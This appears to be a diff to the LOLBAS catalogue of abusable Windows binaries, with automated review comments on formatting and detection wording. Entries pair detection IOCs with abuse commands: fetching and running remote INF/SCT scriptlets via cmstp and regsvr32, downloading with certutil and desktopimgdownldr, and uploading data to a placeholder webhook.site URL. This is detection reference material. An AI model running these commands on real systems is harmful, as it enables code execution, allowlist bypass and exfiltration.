- Link: https://freddiebarrsmith.com/at.txt
|
||||||
- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator
|
- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator
|
||||||
|
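Review bot: The last `- Link:` value in the second hunk is a URL followed by free text, ` - Escalate to System from Administrator`, so anything that renders `Resources[].Link` as a hyperlink emits a broken link; the entry passed through this commit unchanged. Keep only `- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html` as the value and put the description in a `#` comment above it. The `Resources` list may continue past the end of the hunk.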
@ -2,7 +2,7 @@
|
|||||||
Name: Atbroker.exe
|
Name: Atbroker.exe
|
||||||
Description: Helper binary for Assistive Technology (AT)
|
Description: Helper binary for Assistive Technology (AT)
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: ATBroker.exe /start malware
|
- Command: ATBroker.exe /start malware
|
||||||
Description: Start a registered Assistive Technology (AT).
|
Description: Start a registered Assistive Technology (AT).
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Atbroker.exe
|
- Path: C:\Windows\System32\Atbroker.exe
|
||||||
- Path: C:\Windows\SysWOW64\Atbroker.exe
|
- Path: C:\Windows\SysWOW64\Atbroker.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
|
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
|
||||||
@ -26,4 +26,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Adam
|
- Person: Adam
|
||||||
Handle: '@hexacorn'
|
Handle: '@hexacorn'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Bash.exe
|
Name: Bash.exe
|
||||||
Description: File used by Windows subsystem for Linux
|
Description: File used by Windows subsystem for Linux
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: bash.exe -c calc.exe
|
- Command: bash.exe -c calc.exe
|
||||||
Description: Executes calc.exe from bash.exe
|
Description: Executes calc.exe from bash.exe
|
||||||
@ -39,7 +39,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\bash.exe
|
- Path: C:\Windows\System32\bash.exe
|
||||||
- Path: C:\Windows\SysWOW64\bash.exe
|
- Path: C:\Windows\SysWOW64\bash.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Child process from bash.exe
|
- IOC: Child process from bash.exe
|
||||||
@ -50,4 +50,4 @@ Acknowledgement:
|
|||||||
Handle: '@aionescu'
|
Handle: '@aionescu'
|
||||||
- Person: Asif Matadar
|
- Person: Asif Matadar
|
||||||
Handle: '@d1r4c'
|
Handle: '@d1r4c'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Bitsadmin.exe
|
Name: Bitsadmin.exe
|
||||||
Description: Used for managing background intelligent transfer
|
Description: Used for managing background intelligent transfer
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
|
- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
|
||||||
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.
|
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.
|
||||||
@ -39,7 +39,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\bitsadmin.exe
|
- Path: C:\Windows\System32\bitsadmin.exe
|
||||||
- Path: C:\Windows\SysWOW64\bitsadmin.exe
|
- Path: C:\Windows\SysWOW64\bitsadmin.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Child process from bitsadmin.exe
|
- IOC: Child process from bitsadmin.exe
|
||||||
@ -56,4 +56,4 @@ Acknowledgement:
|
|||||||
Handle: '@carnal0wnage'
|
Handle: '@carnal0wnage'
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
---
|
||||||
|
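--- a/yml/OSBinaries/Certoc.yml
+++ b/yml/OSBinaries/Certoc.yml
@@ -0,0 +1,28 @@
+---
+Name: CertOC.exe
+Description: Used for installing certificates
+Author: 'Ensar Samil'
+Created: '2021-10-07'
+Commands:
+  - Command: certoc.exe -LoadDLL "C:\test\calc.dll"
+    Description: Loads the target DLL file
+    Usecase: Execute code within DLL file
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows Server 2022
+Full_Path:
+  - Path: c:\windows\system32\certoc.exe
+  - Path: c:\windows\syswow64\certoc.exe
+Code_Sample:
+  - Code:
+Detection:
+  - IOC: Process creation with given parameter
+  - IOC: Unsigned DLL load via certoc.exe
+Resources:
+  - Link: https://twitter.com/sblmsrsn/status/1445758411803480072?s=20
+Acknowledgement:
+  - Person: Ensar Samil
+    Handle: '@sblmsrsn'
+---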
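Review bot: `Code_Sample:` followed by a bare `- Code:` parses as a one-element list whose `Code` value is null, whereas other entries touched by this commit carry `Code_Sample: []` (visible in the hunk headers of the Openwith.exe, Powershell.exe and AcroRd32.exe sections), so consumers get two shapes for the same field. Use `Code_Sample: []` when there is no sample, or give `Code` an explicit `''`. The `Full_Path` values are also lowercase (`c:\windows\system32\certoc.exe`) while sibling entries write `C:\Windows\System32\...`; harmless on Windows, but inconsistent for any case-sensitive matching in detection tooling that reads these paths.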
@ -2,7 +2,7 @@
|
|||||||
Name: CertReq.exe
|
Name: CertReq.exe
|
||||||
Description: Used for requesting and managing certificates
|
Description: Used for requesting and managing certificates
|
||||||
Author: 'David Middlehurst'
|
Author: 'David Middlehurst'
|
||||||
Created: '2020-07-07'
|
Created: 2020-07-07
|
||||||
Commands:
|
Commands:
|
||||||
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
|
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
|
||||||
Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory
|
Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\certreq.exe
|
- Path: C:\Windows\System32\certreq.exe
|
||||||
- Path: C:\Windows\SysWOW64\certreq.exe
|
- Path: C:\Windows\SysWOW64\certreq.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: certreq creates new files
|
- IOC: certreq creates new files
|
||||||
|
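Review bot: Whichever side of the `Created:` pair is the new one, the unquoted form `Created: 2020-07-07` is read by PyYAML and most YAML 1.1/1.2 loaders as a date object rather than a string, so any generator that string-formats, sorts or compares `Created` will receive a `datetime.date` instead of the text it got from `'2020-07-07'`. Either keep the quotes (`Created: '2020-07-07'`) or make the consuming script tolerate both types before this lands. The same observation applies to every `Created:` line touched elsewhere in this commit, and the newly added Certoc.yml keeps the quoted form, so the corpus ends up mixed. This hunk shows only the header of CertReq.yml; the rest of the entry is outside the visible range.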
@ -2,7 +2,7 @@
|
|||||||
Name: Certutil.exe
|
Name: Certutil.exe
|
||||||
Description: Windows binary used for handling certificates
|
Description: Windows binary used for handling certificates
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
|
- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
|
||||||
Description: Download and save 7zip to disk in the current folder.
|
Description: Download and save 7zip to disk in the current folder.
|
||||||
@ -44,7 +44,7 @@ Commands:
|
|||||||
MitreID: T1140
|
MitreID: T1140
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: certutil --decodehex encoded_hexadecimal_InputFileName
|
- Command: certutil --decodehex encoded_hexadecimal_InputFileName
|
||||||
Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
|
Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
|
||||||
Usecase: Decode files to evade defensive measures
|
Usecase: Decode files to evade defensive measures
|
||||||
Category: Decode
|
Category: Decode
|
||||||
@ -55,7 +55,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\certutil.exe
|
- Path: C:\Windows\System32\certutil.exe
|
||||||
- Path: C:\Windows\SysWOW64\certutil.exe
|
- Path: C:\Windows\SysWOW64\certutil.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Certutil.exe creating new files on disk
|
- IOC: Certutil.exe creating new files on disk
|
||||||
|
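Review bot: The `--decodehex` command names only an input file, while its Description promises a `decodedOutputFileName`; certutil's decodehex mode takes an input and an output file, so as written the command and description disagree and the example will not produce the file the text refers to. Suggested form: `certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName`. The double-dash spelling is also worth re-checking on a real host, since Microsoft documents the option with a single dash. This hunk cuts the Commands list on both sides, so the surrounding entries are not visible here.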
@ -2,7 +2,7 @@
|
|||||||
Name: Cmd.exe
|
Name: Cmd.exe
|
||||||
Description: The command-line interpreter in Windows
|
Description: The command-line interpreter in Windows
|
||||||
Author: 'Ye Yint Min Thu Htut'
|
Author: 'Ye Yint Min Thu Htut'
|
||||||
Created: '2019-06-26'
|
Created: 2019-06-26
|
||||||
Commands:
|
Commands:
|
||||||
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
|
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
|
||||||
Description: Add content to an Alternate Data Stream (ADS).
|
Description: Add content to an Alternate Data Stream (ADS).
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\cmd.exe
|
- Path: C:\Windows\System32\cmd.exe
|
||||||
- Path: C:\Windows\SysWOW64\cmd.exe
|
- Path: C:\Windows\SysWOW64\cmd.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: cmd.exe executing files from alternate data streams.
|
- IOC: cmd.exe executing files from alternate data streams.
|
||||||
|
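Review bot: The only IOC, `cmd.exe executing files from alternate data streams.`, does not cover the command shown in this hunk, which writes `payload.bat` into an ADS of `fakefile.doc` through output redirection rather than executing anything. A second entry along the lines of `- IOC: cmd.exe creating or writing a file whose path contains a ':' stream name (e.g. fakefile.doc:payload.bat)` would match the write; Sysmon's FileCreateStreamHash event is a natural source for it where available. The remainder of the Commands list is outside the visible hunk, so other entries may already rely on the execution IOC.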
@ -1,8 +1,8 @@
|
|||||||
---
|
---
|
||||||
Name: Cmdkey.exe
|
Name: Cmdkey.exe
|
||||||
Description: creates, lists, and deletes stored user names and passwords or credentials.
|
Description: creates, lists, and deletes stored user names and passwords or credentials.
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: cmdkey /list
|
- Command: cmdkey /list
|
||||||
Description: List cached credentials
|
Description: List cached credentials
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\cmdkey.exe
|
- Path: C:\Windows\System32\cmdkey.exe
|
||||||
- Path: C:\Windows\SysWOW64\cmdkey.exe
|
- Path: C:\Windows\SysWOW64\cmdkey.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Usage of this command could be an IOC
|
- IOC: Usage of this command could be an IOC
|
||||||
@ -23,6 +23,6 @@ Resources:
|
|||||||
- Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
|
- Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
|
||||||
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
|
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person:
|
- Person:
|
||||||
Handle:
|
Handle:
|
||||||
---
|
---
|
||||||
|
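Review bot: `Person:` and `Handle:` under Acknowledgement are bare keys, which YAML parses as null rather than as empty strings, so a renderer that expects text will either print `None` or have to special-case this file; either fill them in or give them explicit values (`Person: ''`, `Handle: ''`). The single IOC, `Usage of this command could be an IOC`, gives a detection engineer nothing to key on, since `cmdkey /list` is routine for administrators; something like `- IOC: cmdkey.exe /list launched from an unexpected parent process or by an account that does not normally manage stored credentials` is at least actionable. The MitreID/MitreLink lines for this entry fall outside the visible hunks.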
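--- /dev/null
+++ b/yml/OSBinaries/Cmdl32.yml
@@ -0,0 +1,26 @@
+---
+Name: cmdl32.exe
+Description: Microsoft Connection Manager Auto-Download
+Author: 'Elliot Killick'
+Created: '2021-08-26'
+Commands:
+- Command: cmdl32 /vpn /lan %cd%\config
+Description: Download a file from the web address specified in the configuration file. The downloaded file will be in %TMP% under the name VPNXXXX.tmp where "X" denotes a random number or letter.
+Usecase: Download file from Internet
+Category: Download
+Privileges: User
+MitreID: T1105
+MitreLink: https://attack.mitre.org/techniques/T1105/
+OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+Full_Path:
+- Path: C:\Windows\System32\cmdl32.exe
+- Path: C:\Windows\SysWOW64\cmdl32.exe
+Detection:
+- IOC: Reports of downloading from suspicious URLs in %TMP%\config.log
+- IOC: Useragent Microsoft(R) Connection Manager Vpn File Update
+Resources:
+- Link: https://github.com/LOLBAS-Project/LOLBAS/pull/151
+Acknowledgement:
+- Person: Elliot Killick
+Handle: '@elliotkillick'
+---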
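Review bot: The only Resource is the pull request that introduces this entry, so a reader following the link lands back on the same text with no independent description of how the `config` file must be built or which entry in it carries the download URL; a pointer to the write-up or to Microsoft's Connection Manager profile documentation belongs here. The entry also omits the `Code_Sample:` key that the neighbouring files carry (Certoc.yml in this same commit has `Code_Sample:` with an empty `- Code:`), which may matter if the site generator expects the key to exist. The IOC `Reports of downloading from suspicious URLs in %TMP%\config.log` presumably refers to Connection Manager's own log file; a short clarification of who writes that log would help a responder know where to look.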
@ -2,11 +2,11 @@
|
|||||||
Name: Cmstp.exe
|
Name: Cmstp.exe
|
||||||
Description: Installs or removes a Connection Manager service profile.
|
Description: Installs or removes a Connection Manager service profile.
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
|
- Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
|
||||||
Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
||||||
Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet.
|
Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet.
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1191
|
MitreID: T1191
|
||||||
@ -14,7 +14,7 @@ Commands:
|
|||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
|
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
|
||||||
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
||||||
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
|
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
|
||||||
Category: AwL bypass
|
Category: AwL bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1191
|
MitreID: T1191
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\cmstp.exe
|
- Path: C:\Windows\System32\cmstp.exe
|
||||||
- Path: C:\Windows\SysWOW64\cmstp.exe
|
- Path: C:\Windows\SysWOW64\cmstp.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Execution of cmstp.exe should not be normal unless VPN is in use
|
- IOC: Execution of cmstp.exe should not be normal unless VPN is in use
|
||||||
@ -40,4 +40,4 @@ Acknowledgement:
|
|||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
- Person: Nick Tyrer
|
- Person: Nick Tyrer
|
||||||
Handle: '@NickTyrer'
|
Handle: '@NickTyrer'
|
||||||
---
|
---
|
||||||
|
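Review bot: `MitreID: T1191` is a retired ATT&CK technique; CMSTP now lives under the sub-technique T1218.003, and the `MitreLink` for both commands uses the legacy `/wiki/Technique/` URL form while Cmdl32.yml in this same commit uses `/techniques/T1105/`. Suggested update for both command entries: `MitreID: T1218.003` and `MitreLink: https://attack.mitre.org/techniques/T1218/003/`. The remote-INF command fetches its payload from `api0cradle/LOLBAS`, which looks like a personal fork rather than LOLBAS-Project; if the file also exists in the project repository, pointing at that copy would be more durable. The second hunk cuts the Commands list before its MitreLink line, so that line is not visible here.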
@ -2,7 +2,7 @@
|
|||||||
Name: ConfigSecurityPolicy.exe
|
Name: ConfigSecurityPolicy.exe
|
||||||
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
|
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
|
||||||
Author: 'Ialle Teixeira'
|
Author: 'Ialle Teixeira'
|
||||||
Created: '04/09/2020'
|
Created: 2020-09-04
|
||||||
Commands:
|
Commands:
|
||||||
- Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
|
- Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
|
||||||
Description: Upload file, credentials or data exfiltration in general
|
Description: Upload file, credentials or data exfiltration in general
|
||||||
@ -14,9 +14,9 @@ Commands:
|
|||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
|
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: ConfigSecurityPolicy storing data into alternate data streams.
|
- IOC: ConfigSecurityPolicy storing data into alternate data streams.
|
||||||
- IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS.
|
- IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS.
|
||||||
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe.
|
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe.
|
||||||
|
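Review bot: The second and third sentences of `Description` ("you can configure different pilot collections for each of the co-management workloads...") describe Configuration Manager co-management, not what ConfigSecurityPolicy.exe does, and read as pasted from an unrelated page; trimming to `Description: Binary part of Windows Defender. Used to manage settings in Windows Defender.` keeps only what the entry supports. The single `Full_Path` pins the platform folder `4.18.2008.9-0`, which changes with every Defender platform update, so any path-based rule or check built from this entry will go stale; a note that the version segment varies, or a wildcard in the path, would save readers a false negative. The MitreID/MitreLink lines sit between the two visible hunks and are not shown.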
@ -2,7 +2,7 @@
|
|||||||
Name: Control.exe
|
Name: Control.exe
|
||||||
Description: Binary used to launch controlpanel items in Windows
|
Description: Binary used to launch controlpanel items in Windows
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: control.exe c:\windows\tasks\file.txt:evil.dll
|
- Command: control.exe c:\windows\tasks\file.txt:evil.dll
|
||||||
Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
|
Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\control.exe
|
- Path: C:\Windows\System32\control.exe
|
||||||
- Path: C:\Windows\SysWOW64\control.exe
|
- Path: C:\Windows\SysWOW64\control.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Control.exe executing files from alternate data streams.
|
- IOC: Control.exe executing files from alternate data streams.
|
||||||
@ -28,4 +28,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Jimmy
|
- Person: Jimmy
|
||||||
Handle: '@bohops'
|
Handle: '@bohops'
|
||||||
---
|
---
|
||||||
|
@ -1,8 +1,8 @@
|
|||||||
---
|
---
|
||||||
Name: Csc.exe
|
Name: Csc.exe
|
||||||
Description: Binary file used by .NET to compile C# code
|
Description: Binary file used by .NET to compile C# code
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: csc.exe -out:My.exe File.cs
|
- Command: csc.exe -out:My.exe File.cs
|
||||||
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.
|
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.
|
||||||
@ -23,13 +23,13 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Csc.exe should normally not run a system unless it is used for development.
|
- IOC: Csc.exe should normally not run a system unless it is used for development.
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
|
- Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person:
|
- Person:
|
||||||
Handle:
|
Handle:
|
||||||
---
|
---
|
||||||
|
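Review bot: The IOC reads `Csc.exe should normally not run a system unless it is used for development.`, which is missing a word; `should normally not run on a system` is presumably intended. As in Cmdkey.yml, `Person:` and `Handle:` under Acknowledgement are bare keys that parse as null rather than empty strings; fill them in or give them explicit `''` values so renderers do not have to special-case the file. The rest of the Commands list is outside the visible hunks.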
@ -2,7 +2,7 @@
|
|||||||
Name: Cscript.exe
|
Name: Cscript.exe
|
||||||
Description: Binary used to execute scripts in Windows
|
Description: Binary used to execute scripts in Windows
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: cscript c:\ads\file.txt:script.vbs
|
- Command: cscript c:\ads\file.txt:script.vbs
|
||||||
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
|
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\cscript.exe
|
- Path: C:\Windows\System32\cscript.exe
|
||||||
- Path: C:\Windows\SysWOW64\cscript.exe
|
- Path: C:\Windows\SysWOW64\cscript.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Cscript.exe executing files from alternate data streams
|
- IOC: Cscript.exe executing files from alternate data streams
|
||||||
@ -25,4 +25,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
---
|
||||||
|
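Review bot: The command Description has a typo, `exectute`, which should read `Use cscript.exe to execute a Visual Basic script stored in an Alternate Data Stream (ADS).`. Nothing else in the visible hunks changes meaning; the MitreID/MitreLink lines for this entry are outside the shown range.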
@ -2,7 +2,7 @@
|
|||||||
Name: Desktopimgdownldr.exe
|
Name: Desktopimgdownldr.exe
|
||||||
Description: Windows binary used to configure lockscreen/desktop image
|
Description: Windows binary used to configure lockscreen/desktop image
|
||||||
Author: Gal Kristal
|
Author: Gal Kristal
|
||||||
Created: 28/06/2020
|
Created: 2020-06-28
|
||||||
Commands:
|
Commands:
|
||||||
- Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
|
- Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
|
||||||
Description: Downloads the file and sets it as the computer's lockscreen
|
Description: Downloads the file and sets it as the computer's lockscreen
|
||||||
@ -14,9 +14,9 @@ Commands:
|
|||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\desktopimgdownldr.exe
|
- Path: c:\windows\system32\desktopimgdownldr.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: desktopimgdownldr.exe that creates non-image file
|
- IOC: desktopimgdownldr.exe that creates non-image file
|
||||||
- IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl
|
- IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl
|
||||||
Resources:
|
Resources:
|
||||||
|
